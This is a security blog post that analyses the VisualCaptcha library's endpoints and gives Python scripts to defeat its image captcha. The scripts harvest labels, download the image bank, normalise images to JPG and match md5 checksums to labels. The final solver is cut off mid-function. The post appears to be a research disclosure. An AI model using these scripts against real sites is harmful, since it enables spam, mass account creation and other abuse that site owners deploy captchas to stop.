[Tool] Breaking 100% VisualCaptcha.net solution

Posted by: Yann C.  /   Category: Programming & Development / Projects & tools   /   3 Comments

VisualCaptcha is a widely used solution for protecting websites against automated robots and scripts. As this article details, however, it can be defeated with a 100% success rate.

tl;dr: VisualCaptcha.net can be broken with a 100% success rate using the GitHub scripts available here [Demonstration video].


Quick introduction to CAPTCHAs

A CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is a very popular mechanism, often associated with “security through obscurity”, for protecting against bots and attacks by automated scripts. The idea is to ensure that an action is performed by a “human” and not by a program (a Turing test).

Concretely, on the web, captchas can protect form submissions, including:

  • contact and email forms, to prevent a script or robot from automatically sending thousands of emails;
  • registration forms for newsletters, forums and other CMS, again to avoid mass account creation by a malicious robot;
  • password change, profile modification or email address change forms, where they also act as anti-CSRF protection if properly implemented.

A captcha adds an extra challenge that the user (client side) must answer. The answer is then verified on the server side (against the session), and the form submission is accepted or rejected accordingly.

Many forms of captcha exist. The most commonly used are:

Dynamical captchas

[Figure: dynamic captcha]

These captchas take the form of dynamically generated images (for example with GD2) showing letters, numbers and sometimes symbols. Random “noise” is added to the image to prevent automated deciphering with image analysis tools such as OCR libraries.

Image distortion, noise, pixelation and random backgrounds are typical techniques. They also apply to sound clips (added noise, robotic voices, etc.), which are better suited to visually impaired users.

These captchas are the most common but the least appreciated by users. OCR libraries are becoming ever more effective at breaking them, and to stay robust the captchas become more complex (more noise, more distortion), which makes decoding drastically harder for the end user as well.


Captcha questions


These captchas, presented as images, text or sound, ask the user a question, a riddle, a formula or a problem that (in theory) only a human can answer. Examples include arithmetic captchas (audio or image) and mini-games such as puzzles.


Visual captchas

[Figure: visual captcha]

This more recent form of captcha has reconciled many users with the mechanism thanks to its simplicity. The idea is to look at a series of images and choose the one that matches a given word, e.g. “click on the glasses” or “which images show horses?”. These captchas are especially popular on touch devices such as smartphones and tablets, where the user just touches an image instead of retyping a sequence of characters.

VisualCaptcha, the solution examined in this article, belongs to this category.

Behavioral captchas

[Figure: behavioral captcha]

This category is young and very few solutions exist (open-source ones in particular), but it is particularly robust when properly implemented. The new version of “reCAPTCHA”, designed by Google, illustrates this principle well.

The captcha is triggered by a simple click on a checkbox. After that click, the user’s behavior is analyzed before the captcha is validated or rejected. Mouse movement, entropy, browser features, screen resolution, referer, user-agent: all these parameters help distinguish a “human” from a “robot”.

Captchas therefore provide “security through obscurity” (a much-debated security practice), but they also help:

  • to strengthen protections against CSRF attacks;
  • to prevent the automation of tasks by robots or scripts;
  • to act as a second authentication factor, where the factor involved is “human” versus “robot”.


VisualCaptcha is an open-source reference solution for building simple visual captchas across a multitude of technologies. Provided by visualcaptcha.net and supported by emotionLoop and Clevertech, it is officially available (and supported) for PHP, AngularJS, jQuery, NodeJS, VanillaJS, Ruby, Django and Python, on both the backend and the frontend side, and has unofficial ports for ASP.NET, Java, Laravel, CakePHP, SailsJS, Grails, Meteor, etc. Some well-known CMS, such as WordPress, integrate it as a plugin. (See the VisualCaptcha GitHub.)

In other words, this captcha solution interfaces easily with all types of projects, and it has won over many developers and users thanks to its ease of use on touch devices.

[Figure: VisualCaptcha features]

VisualCaptcha was partially broken in the past (August 14, 2013, versions before 4.2.0), but the success rate was not 100%. It was broken again in 2014 and 2015. However, none of these techniques came with a generic, adaptable and configurable script that works through a proxy such as Burp. In addition, those solutions relied on OCR or image analysis libraries, and are therefore slower than what I propose here.

To list some of the websites that use VisualCaptcha, run the following Google search (with the quotes):

"Type below the answer to what you hear"

Note: this article only covers breaking the image mechanism. A method for the audio mechanism may follow 😉 !

VisualCaptcha analysis


Most implementations of VisualCaptcha, whatever the technology (PHP, Java, etc.), work on the same principle. To illustrate this article, the official demo page for the latest version of VisualCaptcha (demo.visualcaptcha.net) will be the “target”.

[Figure: VisualCaptcha demo page]

When a page protected by VisualCaptcha is loaded, JavaScript code in the page loads the captcha. Building it in the DOM triggers an asynchronous (AJAX) request to a URL (endpoint), which by default is “/start”:

[Figure: VisualCaptcha AJAX call /start]

Endpoint /start

This call to “/start” takes the form “/start/5?r=XXXXXXXXXXXX” and has the following parts:

  • /start: the initialization entry point of the captcha (endpoint).
  • 5: the number of random images to display to the user. If this value is set to 1 (to display a single choice), VisualCaptcha enforces a minimum of 4 images (2 in previous versions). If it is set to “10000”, for example, every image in the image library is returned: 37 in VisualCaptcha’s default image bank.
  • ?r=XXXXXXXXXXXX: the GET parameter “r” acts as a “unique session key” for the current captcha (12 lowercase alphanumeric characters). It is a random string (nonce) stored in the server-side session, and the browser reuses the same value to load the right images (PNG).
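To make the URL layout concrete, here is a minimal sketch that builds such a “/start” URL with a 12-character lowercase alphanumeric “r” value. The helper name `build_start_url` and the `NONCE_ALPHABET` constant are hypothetical (they are not part of VisualCaptcha); only the URL structure comes from the observation above.

```python
import random
import string

# Alphabet assumed from the observed "r" values: lowercase letters and digits
NONCE_ALPHABET = string.ascii_lowercase + string.digits


def build_start_url(base_url, image_count, nonce=None):
    """Return a /start URL asking for image_count images (hypothetical helper)."""
    if nonce is None:
        # 12 random characters, as seen in the demo page requests
        nonce = "".join(random.choice(NONCE_ALPHABET) for _ in range(12))
    return "{0}/start/{1}?r={2}".format(base_url.rstrip("/"), image_count, nonce)


print(build_start_url("http://demo.visualcaptcha.net", 5, nonce="abc123def456"))
print(build_start_url("http://demo.visualcaptcha.net", 37))
```

Passing the nonce explicitly is handy because the same value has to be reused later when fetching the images.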

This AJAX call to “/start/5?r=XXXXXXXXXXXX” returns JSON, which the page’s JavaScript uses to generate the current visual captcha in the DOM.

JSON details:

  • values: a list of 5 random values (because of “/start/5”), one unique code for each of the 5 images offered as choices in the user’s browser, in display order.
  • imageName: the text label of the image to choose, such as “tree”, “leaf”, “car” or “glasses”.
  • imageFieldName: the name attribute of the hidden input that will store the value of the image selected by the user. This field name is randomized on each display.
  • audioFieldName: the name attribute of the hidden input that will store the answer typed by the user after listening to the audio (if the “audio” mode is chosen rather than “image”). This field name is also randomized on each display.
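As an illustration of the structure just described, the sketch below parses a response of that shape. Every value in `SAMPLE_START_RESPONSE` is invented for the example (it is not a capture from the demo portal), and `parse_start_response` is a hypothetical helper; only the four field names come from the analysis.

```python
import json

# Hypothetical /start/5 response: all values below are made up for illustration
SAMPLE_START_RESPONSE = """
{
  "values": ["aaa111", "bbb222", "ccc333", "ddd444", "eee555"],
  "imageName": "Tree",
  "imageFieldName": "f1e2d3",
  "audioFieldName": "a9b8c7"
}
"""

EXPECTED_KEYS = ("values", "imageName", "imageFieldName", "audioFieldName")


def parse_start_response(raw_json):
    """Decode the JSON and check that the four documented fields are present."""
    data = json.loads(raw_json)
    missing = [key for key in EXPECTED_KEYS if key not in data]
    if missing:
        raise ValueError("unexpected /start response, missing: " + ", ".join(missing))
    return data


captcha = parse_start_response(SAMPLE_START_RESPONSE)
print("Label to find:", captcha["imageName"])
print("Number of choices:", len(captcha["values"]))
print("Hidden field for the image answer:", captcha["imageFieldName"])
```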

Let’s play a little with “/start” and ask it for a single image (which would make the captcha trivial to solve, right?).

Ah. Although a single image was requested with “1”, the “values” list still contains 4 values. This protection is built into VisualCaptcha. Older versions allowed a minimum of only 2 images (so a one-in-two chance of guessing).

Now let’s try to display 10000 values.

We do not get 10000 values, only 37 (the default number of images in VisualCaptcha’s image bank).

This is the weakness of visual captchas: a library of images (and sounds) of fixed size.
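The behavior observed above amounts to clamping the requested number between a minimum and the library size. A small sketch of that rule, using the default figures seen on the demo portal (4 and 37); the function name is hypothetical and this is a model of the observed behavior, not VisualCaptcha’s actual code:

```python
def effective_image_count(requested, minimum=4, library_size=37):
    """Number of values /start returns under the observed clamping (a model)."""
    return max(minimum, min(requested, library_size))


for requested in (1, 5, 10000):
    count = effective_image_count(requested)
    # A blind guess succeeds with probability 1 / count
    print(requested, "->", count, "images, blind guess:", round(100.0 / count, 1), "%")
```

With the minimum of 4, a blind guess already succeeds one time in four; with the older minimum of 2, one time in two.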

Even when two calls to “/start” use the same “?r=XXXXXXXXXXXX” parameter, the returned “values” and the other fields are different and random each time.

HTML/DOM source code…

On the HTML side, the source of the protected page uses JavaScript to initialize the captcha in the DOM. Inspecting the DOM shows that the JSON value “imageName” (the label of the picture to click) is displayed as-is:

[Figure: VisualCaptcha source code 01]

In addition, the random string “?r=XXXXXXXXXXXX” used by the AJAX call to “/start” when initializing the captcha is used again to retrieve each image to display, from “/image/0?r=XXXXXXXXXXXX” to “/image/4?r=XXXXXXXXXXXX” (5 images, because of “/start/5”).

The random name of the hidden field that will hold the value of the clicked image is also present:

[Figure: VisualCaptcha source code 02]

When you click on the first image displayed (/image/0), the first value of the JSON “values” list is injected into the hidden field.

[Figure: VisualCaptcha source code 03]

When you click on the last image (/image/4), the last value of the JSON “values” list is injected into the hidden field. The entries of “values” are ordered in the same way as the display index of each image.

[Figure: VisualCaptcha source code 04]
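The click behavior described above boils down to “hidden field = values[index of the clicked image]”. A minimal sketch (Python 3), with invented field name and values and a hypothetical helper name:

```python
from urllib.parse import urlencode


def build_captcha_field(start_data, clicked_index):
    """Return the {field name: value} pair the page would submit for a click."""
    values = start_data["values"]
    if not 0 <= clicked_index < len(values):
        raise IndexError("no image at index {0}".format(clicked_index))
    return {start_data["imageFieldName"]: values[clicked_index]}


# Invented data with the same shape as a /start/5 response
start_data = {
    "values": ["v0", "v1", "v2", "v3", "v4"],
    "imageFieldName": "field42",
}

# Clicking the last image (/image/4) selects the last entry of "values"
print(urlencode(build_captcha_field(start_data, 4)))  # prints "field42=v4"
```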

Form submission and POST data

When the form is submitted, the POST data contains our hidden field, whose name is the value of “imageFieldName” and whose value is the entry of “values” corresponding to the clicked image:

POST /try HTTP/1.1
Host: demo.visualcaptcha.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,en;q=0.8,fr_fr;q=0.5,en_us;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.visualcaptcha.net/
Cookie: PHPSESSID=mit7fi867tj8lf0iiq24o4htk3
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52


Obviously, this POST capture is specific to the VisualCaptcha demo portal. On other sites using VisualCaptcha, the captcha may be submitted differently (GET, POST multipart/form-data, etc.).

On the VisualCaptcha demo page, the captcha is POSTed to the “/try” endpoint, which answers with a 302 redirect that depends on whether the captcha is valid:

  • Location: /?status=failedImage (invalid captcha, checked on server side by “/try”)
  • Location: /?status=validImage (valid captcha, checked on server side by “/try”)
[Figure: VisualCaptcha demo results]
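For scripting purposes, the outcome can be read straight from the “Location” header of that redirect. A small sketch (Python 3, standard library only); the function name is hypothetical and the two status strings are the ones returned by the demo portal:

```python
from urllib.parse import urlparse, parse_qs


def captcha_outcome(location):
    """Return True for validImage, False for failedImage, None otherwise."""
    query = parse_qs(urlparse(location).query)
    status = query.get("status", [None])[0]
    if status == "validImage":
        return True
    if status == "failedImage":
        return False
    return None


print(captcha_outcome("/?status=validImage"))
print(captcha_outcome("/?status=failedImage"))
```

With the requests library, the header can be obtained by sending the POST with `allow_redirects=False` and reading `response.headers["Location"]`. Other sites will signal success differently, so this check is specific to the demo page.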

Mini Analysis Summary

In summary:

  • When a page protected by VisualCaptcha is displayed in a browser, an AJAX call is made to “/start/NUMBER?r=XXXXXXXXXXXX”, where NUMBER is effectively between 4 and 37 by default and XXXXXXXXXXXX is a unique random lowercase alphanumeric string stored in the session.
  • If NUMBER is set to 1, at least 4 values are returned (2 on older versions of VisualCaptcha).
  • If NUMBER is set to 10000 or more, the maximum number of values (i.e. the number of unique images) is returned, 37 by default.
  • The random string “?r=XXXXXXXXXXXX” used in the initial call to “/start” is reused to load each PNG image: “/image/0?r=XXXXXXXXXXXX”, “/image/1?r=XXXXXXXXXXXX”, etc.
  • The hidden HTML input named after “imageFieldName” takes as its value the entry of “values” that corresponds to the clicked image.
  • The JSON field “imageName” is the text label indicating which image must be clicked.
  • The JSON list “values” is in the same order as the displayed images.

Well, now what? With this analysis we have everything needed to write a script that automatically solves any captcha produced by VisualCaptcha!

Breaking VisualCaptcha

Captcha me if you can !

Breaking any VisualCaptcha requires several preliminary steps. Most of them are automated and quick, but one manual task awaits…

  • Enumerate all possible text answers (automatic)
  • Collect the whole image database (automatic)
  • Convert all images from PNG to JPG (automatic)
  • Create the checksum / label correlation table (manual…)
  • Go break every VisualCaptcha!

Enumerate all the possibilities for text responses

As a first step, we need to list all the possible “text” answers implemented in VisualCaptcha.

If VisualCaptcha has been deployed on a site or application without much customization, the images and text answers are most likely the default ones, i.e. 37 of them, with labels like:

Airplane, Balloons, Camera, Car, Cat, Chair, Clip, Clock, Cloud, Computer, Envelope, Eye, Flag, Folder, Foot, Graph, House, Key, Leaf, Light Bulb, Lock, Magnifying Glass, Man, Music Note, Pants, Pencil, Printer, Robot, Scissors, Sunglasses, T-Shirt, Tag, Tree, Truck, Umbrella, Woman, World

How can we retrieve and check all the answers included in VisualCaptcha?

Simple: we query the “/start” endpoint many times (1000 requests) and collect every value of “imageName”. We put these values into an array, remove the duplicates, sort the result and finally display it.

Python script (available here):

import requests
import json
target = "http://demo.visualcaptcha.net"
nbRequest = 1000
imagesNames = []
for i in range(0, nbRequest):
    # A fresh session per request forces a new captcha each time
    session = requests.Session()
    response = session.get(target+"/start/1")
    data = json.loads(response.text)
    # Record the label requested by this captcha
    imagesNames.append(data["imageName"])
# Remove duplicates and sort the collected labels
sortedImagesNames = sorted(set(imagesNames))
print("[*] There are " + str(len(sortedImagesNames)) + " responses possible.")
print(", ".join(sortedImagesNames))

Example output for the demo portal (in English):

# python enum_VisualCaptcha_texts.py
[*] There are 37 responses possible.
Airplane, Balloons, Camera, Car, Cat, Chair, Clip, Clock, Cloud, Computer, Envelope, Eye, Flag, Folder, Foot, Graph, House, Key, Leaf, Light Bulb, Lock, Magnifying Glass, Man, Music Note, Pants, Pencil, Printer, Robot, Scissors, Sunglasses, T-Shirt, Tag, Tree, Truck, Umbrella, Woman, World

The set of possible answers is now in our possession (increase the number of requests to “/start” to be sure of collecting every possible answer).
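How many requests are “enough”? Assuming each request picks its label uniformly at random among the 37 possibilities (an assumption, I did not verify how VisualCaptcha draws it), this is the classic coupon collector problem. The sketch below computes the expected number of requests needed to see every label, and an upper bound on the probability of still missing one after a given number of requests; both function names are mine.

```python
def expected_requests(n_labels):
    """Expected number of uniform draws needed to see all n_labels at least once."""
    return n_labels * sum(1.0 / k for k in range(1, n_labels + 1))


def miss_probability_bound(n_labels, n_requests):
    """Union bound on the probability that at least one label was never drawn."""
    return n_labels * (1.0 - 1.0 / n_labels) ** n_requests


print("Expected requests for 37 labels:", round(expected_requests(37), 1))
print("Bound on missing a label after 1000 requests:", miss_probability_bound(37, 1000))
```

Under that assumption, on the order of 150 to 160 requests are needed on average, and 1000 requests leave a negligible chance of missing a label.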

Recover the entire image database

After recovering all the possible text answers, the next step is to download the entire image database.

If the captcha is initialized with the call “/start/5?r=XXXXXXXXXXXX”, then 5 distinct images are accessible through these URLs:

  • /image/0?r=XXXXXXXXXXXX
  • /image/1?r=XXXXXXXXXXXX
  • /image/2?r=XXXXXXXXXXXX
  • /image/3?r=XXXXXXXXXXXX
  • /image/4?r=XXXXXXXXXXXX

The image “/image/5?r=XXXXXXXXXXXX” does not exist (404), because the captcha with session key “XXXXXXXXXXXX” was initialized with “5”.

We must therefore call “/start” with a large number of images, such as 10000, or more precisely with the exact number of possible images determined previously (37): “/start/37?r=XXXXXXXXXXXX”. The 37 images can then be retrieved via these URLs:

  • /image/0?r=XXXXXXXXXXXX
  • /image/1?r=XXXXXXXXXXXX
  • […]
  • /image/35?r=XXXXXXXXXXXX
  • /image/36?r=XXXXXXXXXXXX

A small Python script to download all the images into a previously created “./imgPng” directory (available here):

import requests
import json
target = "http://demo.visualcaptcha.net"
pathImgDb = "./imgPng"
session = requests.Session()
# Ask for far more images than exist so that the whole library is returned
response = session.get(target+"/start/10000?r=RaNdoMsTrInG")
data = json.loads(response.text)
nbImg = len(data["values"])
print("[*] There are " + str(nbImg) + " pictures in the VisualCaptcha database of [" + target + "]")
for i in range(0, nbImg):
    imgReq = session.get(target+"/image/" + str(i) + "?r=RaNdoMsTrInG")
    if imgReq.status_code == 200:
        # Save the current PNG picture
        with open(pathImgDb + "/" + str(i) + ".png", 'wb') as f:
            f.write(imgReq.content)
        print("[+] " + pathImgDb + "/" + str(i) + ".png download")

Let’s take a look at our directory:

VisualCaptcha pictures

VisualCaptcha pictures

Perfect ! Time to move on!

Convert all images from PNG to JPG

Why this chapter? We have the whole image bank in PNG, so why convert it to JPG?

The reason is very simple. On April 30, 2014, a “major” change to VisualCaptcha was released. It is discussed in this topic. The developers of the solution now add extra random bytes (1 to 50) to each picture every time it is served (for example “the printer”). In other words, an image library downloaded once cannot be compared byte for byte with the same library downloaded again into another folder.

“Compare with what?”

The idea is to compute the checksum (md5sum) of each PNG image. But because of the random byte(s) added, which change the size of the file, several downloads of the “same” image (still the printer example) all have different checksums…

Example of the printer image retrieved 3 times (printer1.png, printer2.png and printer3.png) after refreshing the page several times:

# md5sum printer*.png
e31dead53ece8c2df18cac7518f6b89a  printer1.png
086676587e026e3e7c8f86831657c0c8  printer2.png
fbee80e758f9c3f97f0937ae57376a25  printer3.png

Although these 3 images show exactly the same printer, the file sizes vary slightly because of the random bytes added by VisualCaptcha… So comparing by checksum is not possible with the PNG files…
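To see why a few extra bytes are enough to defeat a plain checksum, here is a small simulation. It assumes the random bytes are simply appended to the image data (the exact placement used by VisualCaptcha is an assumption here), and the “image” is a stand-in byte string, not a real PNG.

```python
import hashlib
import os
import random


def with_random_padding(image_bytes, max_pad=50):
    """Simulate the protection: append 1 to max_pad random bytes (placement assumed)."""
    return image_bytes + os.urandom(random.randint(1, max_pad))


# Stand-in for the bytes of one picture; not a valid PNG file
original = b"\x89PNG\r\n\x1a\n" + b"stand-in for real image data"

for _ in range(3):
    served = with_random_padding(original)
    # Same picture, different size and different checksum on every download
    print(len(served), hashlib.md5(served).hexdigest())
```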

This VisualCaptcha protection only appeared following this topic (source code here). Older versions do not apply this change, so each image always returns the same checksum.

 // Create a hex string from random bytes
 private function utilRandomHex( $count ) {
     return bin2hex( openssl_random_pseudo_bytes( $count ) );
 }

To work around this protection, the idea is to convert each PNG to JPG!

Converting to JPG re-encodes the picture: the file size changes (in bytes, not in pixels), unnecessary data is dropped and a fully valid JPG file is produced. The images certainly lose their transparency and some quality, but this does not matter for breaking captchas 🙂
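As a side note, here is a different normalization that needs no image library. It is not the method used in this article (the scripts rely on the JPG conversion), just a sketch under one strong assumption: that the random bytes are appended after the end of the PNG stream. In that case, hashing the file only up to and including the IEND chunk gives a stable digest. If the bytes were inserted elsewhere, this sketch would not neutralize them. All function names are mine.

```python
import hashlib
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(tag, payload):
    """Serialize one PNG chunk: length, type, data, CRC."""
    crc = zlib.crc32(tag + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + tag + payload + struct.pack(">I", crc)


def stable_png_digest(data):
    """MD5 of the PNG stream up to and including IEND; trailing bytes are ignored."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG stream")
    offset = len(PNG_SIGNATURE)
    while offset + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[offset:offset + 8])
        offset += 8 + length + 4  # chunk header, payload, CRC
        if tag == b"IEND":
            return hashlib.md5(data[:offset]).hexdigest()
    raise ValueError("IEND chunk not found")


# Build a tiny 1x1 RGB PNG by hand so the example needs no image library
ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte + one red pixel
png = PNG_SIGNATURE + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")

padded_a = png + b"\x01\x02\x03"
padded_b = png + b"\xaa" * 40
print(hashlib.md5(padded_a).hexdigest() == hashlib.md5(padded_b).hexdigest())  # plain md5
print(stable_png_digest(padded_a) == stable_png_digest(padded_b))  # digest up to IEND
```

The JPG conversion has the advantage of working wherever the extra bytes sit, as long as they do not change the decoded pixels.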

Python script PNG2JPG:

from PIL import Image  # Pillow; the legacy "import Image" form is not available with it
for name in ("printer1", "printer2", "printer3"):
    # JPEG has no alpha channel: drop transparency before saving
    im = Image.open(name + ".png").convert("RGB")
    im.save(name + ".jpg", "JPEG")

Checksum results:

4b6b62f3be8168abba5ad105eb086fb9  printer1.jpg
4b6b62f3be8168abba5ad105eb086fb9  printer2.jpg
4b6b62f3be8168abba5ad105eb086fb9  printer3.jpg

This is good! The JPEG checksums are identical even though the 3 PNG files differ!

The following script converts all the images in the “./imgPng” folder to “./imgJpg” (script available here):

from PIL import Image  # Pillow
from os import listdir
from os.path import isfile, join
imgPngDir = "./imgPng"
imgJpgDir = "./imgJpg"  # must already exist
imgPngFiles = [f for f in listdir(imgPngDir) if isfile(join(imgPngDir, f))]
for img in imgPngFiles:
    if img.endswith(".png"):
        # JPEG has no alpha channel: drop transparency before saving
        im = Image.open(imgPngDir+"/"+img).convert("RGB")
        im.save(imgJpgDir + "/" + img + ".jpg", "JPEG")
        print("[+] Original VisualCaptcha PNG [" + imgPngDir + "/" + img + "] converted to JPG here [" + imgJpgDir + "/" + img + ".jpg]")

Let’s check our JPG files:

[Figure: VisualCaptcha pictures JPG]

They have lost some quality and their transparency, but each one is still distinct and recognizable, and their checksums are now comparable. That is enough to continue!

Creating the correlation table checksums / labels

We now have the total number of images, every image in JPG, and all the text labels that VisualCaptcha offers. Let’s create the correspondence table between each checksum and its text label (a manual task, sorry…):

# md5sum ./imgJpg/*.jpg
c17b70628392f6d696cc1b25f5fb386f ./imgJpg/0.png.jpg
c4fe178b16c681fef26860d36410aff4 ./imgJpg/10.png.jpg
0b80d90a8eae32c984481cfce01872f4 ./imgJpg/11.png.jpg
fcf9b5602694bfd0e3a97036a700affc ./imgJpg/12.png.jpg
446bf84f96960d03b4ed97ee4f60fc92 ./imgJpg/13.png.jpg
76aea7d6235509a1ce3a04d168434eb8 ./imgJpg/14.png.jpg
2a6a41f2f3b204c917fd03ee5a74cc2c ./imgJpg/15.png.jpg
8edd4f6aba641a23545e242c4d00baf1 ./imgJpg/16.png.jpg
9c4a256697476081b8eb34a05501ef2e ./imgJpg/17.png.jpg
aa7e561ebc0fba06d30f5ecdb55c0841 ./imgJpg/18.png.jpg
943f4c78b35672d6fe2d8d7c7b16c2b2 ./imgJpg/19.png.jpg
63c155f036c3a013362c527a055e258b ./imgJpg/1.png.jpg
89b833eb55b97c717d9b0d9d12788233 ./imgJpg/20.png.jpg
86666417338139368ca43a8963ebced2 ./imgJpg/21.png.jpg
72a676cfde643c841232c76f60989090 ./imgJpg/22.png.jpg
351eb8558342cdab5bd37c9aa5ed7ee0 ./imgJpg/23.png.jpg
456780afb08cdaf562af8d89497bc875 ./imgJpg/24.png.jpg
872af7339e75f6cae2313eb28aac9c44 ./imgJpg/25.png.jpg
b7ca3af8c38fa6e4f9a0cb5ed89bc493 ./imgJpg/26.png.jpg
44561c957ab6ea338bafa9d7a52d9992 ./imgJpg/27.png.jpg
4b6b62f3be8168abba5ad105eb086fb9 ./imgJpg/28.png.jpg
433cdaaf1e0ca0d8367727f7e7497c12 ./imgJpg/29.png.jpg
6b99e64fe2b18c6ec388b8080bcd9947 ./imgJpg/2.png.jpg
f5f79595f81967f383fa289e3e682c23 ./imgJpg/30.png.jpg
1d42c40b62bf899b25f1cddade543658 ./imgJpg/31.png.jpg
ecad2ea49116b86c4eea21f0cd076e62 ./imgJpg/32.png.jpg
eaa28a149864637c6d3bb7c58cdae136 ./imgJpg/33.png.jpg
287c4df92b339bdedf65cea6fc7977f9 ./imgJpg/34.png.jpg
35b1b173e847b202eedac99db3002da9 ./imgJpg/35.png.jpg
65b32b9748014155896de24c2ba4a408 ./imgJpg/36.png.jpg
93d5e02b511f42936c5d4873f6b064ea ./imgJpg/3.png.jpg
39092d7718747b6f0b01cb7282d136bc ./imgJpg/4.png.jpg
2739865da34888314752ee72ea97bf76 ./imgJpg/5.png.jpg
139da71c5ac0954f668ff1947e73245f ./imgJpg/6.png.jpg
6612e4fabfb7219ed0662d3901a50b4a ./imgJpg/7.png.jpg
0985b57fb6a40d3142534f5e2c59d7f4 ./imgJpg/8.png.jpg
17a86e0825bc56546efa762160af0d19 ./imgJpg/9.png.jpg

Script available here.

From all these JPG / PNG checksums, we need to produce the (Python) dictionary below. To do so, you have to look at each image and manually associate it with the corresponding text label:

# For newer versions of VisualCaptcha (5.x), pictures are served with random bytes added and must be converted from PNG to JPG to get a stable checksum, so the dict below holds both the JPG and the PNG checksums.
# Dictionary of key:value with:
# labelEN = textual solution of the captcha in English (you may change these labels for your language)
# labelFR = textual solution of the captcha in French (you may change these labels for your language)
# md5SumPng = checksum of the original picture in PNG
# md5SumJpg = checksum of the picture converted from PNG to JPG (to neutralize the random bytes added by VisualCaptcha)
dicoImg = {}
dicoImg[0] = {"labelEN":u"Airplane", "labelFR":u"l'avion", "md5SumPng":"6244aa85ad7e02e7a46544d5deab0225", "md5SumJpg":"c4fe178b16c681fef26860d36410aff4"}
dicoImg[1] = {"labelEN":u"Balloons", "labelFR":u"le ballon", "md5SumPng":"4c3fbd0824a5f2f3c58069c0416755e7", "md5SumJpg":"c17b70628392f6d696cc1b25f5fb386f"}
dicoImg[2] = {"labelEN":u"Camera", "labelFR":u"la camera", "md5SumPng":"00ab6b7f0972d5b5d2bef888ab198929", "md5SumJpg":"fcf9b5602694bfd0e3a97036a700affc"}
dicoImg[3] = {"labelEN":u"Car", "labelFR":u"la voiture", "md5SumPng":"281398645bee48e8c78cf8f650dc830e", "md5SumJpg":"2a6a41f2f3b204c917fd03ee5a74cc2c"}
dicoImg[4] = {"labelEN":u"Cat", "labelFR":u"le chat", "md5SumPng":"e3f67527bdff4b14a8297bb61e6b3c6a", "md5SumJpg":"89b833eb55b97c717d9b0d9d12788233"}
dicoImg[5] = {"labelEN":u"Chair", "labelFR":u"la chaise", "md5SumPng":"6a385164d1f36e6c2e137c1fc11569bc", "md5SumJpg":"456780afb08cdaf562af8d89497bc875"}
dicoImg[6] = {"labelEN":u"Clip", "labelFR":u"le trombone", "md5SumPng":"99be7138303ce797139a56c78e1b0143", "md5SumJpg":"aa7e561ebc0fba06d30f5ecdb55c0841"}
dicoImg[7] = {"labelEN":u"Clock", "labelFR":u"l'horloge", "md5SumPng":"4039b8c0aa05f2c35402da5842e2a37c", "md5SumJpg":"6612e4fabfb7219ed0662d3901a50b4a"}
dicoImg[8] = {"labelEN":u"Cloud", "labelFR":u"le nuage", "md5SumPng":"f25649f668fcc7ac37272ed5b6297087", "md5SumJpg":"76aea7d6235509a1ce3a04d168434eb8"}
dicoImg[9] = {"labelEN":u"Computer", "labelFR":u"l'ordinateur", "md5SumPng":"a4672d1d019615d061e40ee2c93ee625", "md5SumJpg":"943f4c78b35672d6fe2d8d7c7b16c2b2"}

Our dictionary is ready (see this script)! Let’s move on to breaking VisualCaptcha.
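Since the breaker has to go from a checksum to a label, it can help to flip the dictionary into a direct checksum-to-label index. A minimal sketch, using the first two entries of the dictionary above (the real table has one entry per image); `build_lookup` is a hypothetical helper and not necessarily how the final script organizes its data:

```python
# Two entries copied from the dictionary above
dicoImg = {
    0: {"labelEN": u"Airplane",
        "md5SumPng": "6244aa85ad7e02e7a46544d5deab0225",
        "md5SumJpg": "c4fe178b16c681fef26860d36410aff4"},
    1: {"labelEN": u"Balloons",
        "md5SumPng": "4c3fbd0824a5f2f3c58069c0416755e7",
        "md5SumJpg": "c17b70628392f6d696cc1b25f5fb386f"},
}


def build_lookup(dico, label_key="labelEN"):
    """Index every known checksum (PNG and JPG) by its text label."""
    lookup = {}
    for entry in dico.values():
        lookup[entry["md5SumPng"]] = entry[label_key]
        lookup[entry["md5SumJpg"]] = entry[label_key]
    return lookup


lookup = build_lookup(dicoImg)
print(lookup.get("c4fe178b16c681fef26860d36410aff4"))  # prints "Airplane"
```

Switching `label_key` to "labelFR" would index the same checksums by their French labels, for sites that display the captcha in French.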

Breaking captchas !

How will the process work? You have a form (sending mail, registration, password reset, etc.) protected with VisualCaptcha. You have collected all the labels, converted all the images to JPG, and created the lookup table.

Now you have to produce the form submission POST request (in this example, the one for “demo.visualcaptcha.net”) with the correct POST variable name and the correct POST value.

The last script presented here automates this. The idea is to:

  1. Query “/start” with a small number (to get fewer candidate images) and keep all the JSON parameters, including “imageName”, “values” and “imageFieldName”.
  2. Download (still automatically via the script) the PNG images (4 or 2 depending on your version of VisualCaptcha) associated with the current captcha session.
  3. Convert each downloaded image to JPG (in memory, no local files created).
  4. Compute the MD5 checksum of each PNG image and of its JPG conversion.
  5. Look up the md5sum of each of the 4 images in the key-value dictionary.
  6. Compare the labels found in the dictionary with “imageName”.
  7. If a label matches, submit the form by POST with imageFieldName = values[N], where N is the index of the matching picture, to validate the captcha!
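The matching logic of steps 4 to 7 can be sketched as follows. This is a simplified illustration, not the code of VisualCaptchaBreaker: the network calls are left out, the image bytes and labels are toy data, and `normalize` is a hypothetical hook where a PNG-to-JPG conversion (step 3) would be plugged in.

```python
import hashlib


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def solve_captcha(start_data, images, lookup, normalize=None):
    """Return (field_name, value) for the image matching imageName, or None.

    start_data -- parsed JSON from /start
    images     -- raw bytes of /image/0 ... /image/N-1, in display order
    lookup     -- dict mapping checksum -> label
    normalize  -- optional callable giving a stable form of the image bytes
                  (for example a PNG-to-JPG conversion); hypothetical hook
    """
    wanted = start_data["imageName"]
    for index, raw in enumerate(images):
        checksums = [md5_hex(raw)]
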